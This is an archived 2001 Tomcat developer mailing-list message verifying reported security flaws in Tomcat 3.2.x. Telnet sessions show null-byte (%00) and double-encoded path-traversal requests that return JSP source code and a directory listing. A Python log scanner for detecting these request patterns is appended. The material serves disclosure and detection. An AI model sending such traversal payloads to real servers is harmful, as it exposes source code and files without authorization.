tomcat-dev mailing list archives

From Stephan Seyboth <...@caldera.de>
Subject Re: TC3.2.x and security problems
Date Wed, 04 Apr 2001 14:08:20 GMT
On Wed, Apr 04, 2001 at 08:35:11AM -0500, Marc Saegesser wrote:
> Has anyone on tomcat-dev been able to reproduce these problems using Tomcat
> 3.2.x?  I've been trying to reproduce the error using 3.2.1, 3.2.2b2 and
> even 3.1.1.  So far I always get a 404.  I've never been able to get
> directory listing or JSP source.

[...]

> > > exploits:
> > > http://target:8080/%2e%2e/%2e%2e/%00.jsp
> > > It is possible to cause the Tomcat server to Listing
> > > outside the document root directory scope.

I can't reproduce that one, but could verify the following problems
on Linux:

$ telnet localhost 8080
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT
Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
 
[numguess.jsp source follows]
 
$ telnet localhost 8180
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp%00
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Wed, 04 Apr 2001 10:37:30 GMT
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
 
[numguess.jsp source follows]

$ telnet localhost 8180
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /%252e%252e/%252e%252e/%00.jsp
 
HTTP/1.0 200 OK
Content-Type: text/html;charset=ISO-8859-1
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)

[directory listing follows]

-- 
Stephan Seyboth - Developer
Caldera (Deutschland) GmbH
http://www.caldera.de/
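A small log check for the two request shapes shown in the sessions above (a trailing %00 on a .jsp path and a double-encoded ../ traversal), added here as an example; it is not part of Stephan's message or of Tomcat. The log lines are constructed, and the function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed Common Log Format lines modelled on the requests in the message
# above; they are sample data, not real logs.
SAMPLE_LOG = """\
127.0.0.1 - - [04/Apr/2001:14:08:20 +0000] "GET /examples/jsp/num/numguess.jsp HTTP/1.0" 200 1237
127.0.0.1 - - [04/Apr/2001:14:08:21 +0000] "GET /examples/jsp/num/numguess.jsp%00 HTTP/1.0" 200 1237
127.0.0.1 - - [04/Apr/2001:14:08:22 +0000] "GET /%252e%252e/%252e%252e/%00.jsp HTTP/1.0" 200 -
127.0.0.1 - - [04/Apr/2001:14:08:23 +0000] "GET /examples/images/code.gif HTTP/1.0" 200 1234
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"')


def decode_fully(target, max_rounds=3):
    """Percent-decode until stable; return (decoded, rounds) so double encoding is visible."""
    rounds, current = 0, target
    while rounds < max_rounds:
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def classify_target(target):
    """Findings for one request target: null byte, dot-dot segment, double encoding."""
    decoded, rounds = decode_fully(target.split("?", 1)[0])
    findings = []
    if "\x00" in decoded:
        findings.append("null-byte")
    if ".." in decoded.replace("\\", "/").split("/"):
        findings.append("dot-dot-traversal")
    if rounds >= 2:
        findings.append("double-encoded")
    return findings


def scan_log(text):
    """Return [(target, findings)] for every log line whose request target is suspicious."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        findings = classify_target(m.group("target")) if m else []
        if findings:
            hits.append((m.group("target"), findings))
    return hits
```

Decoding until the string stops changing is what makes the %252e form visible as ../; a single decode pass, like the one that let the listing through, only sees %2e.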
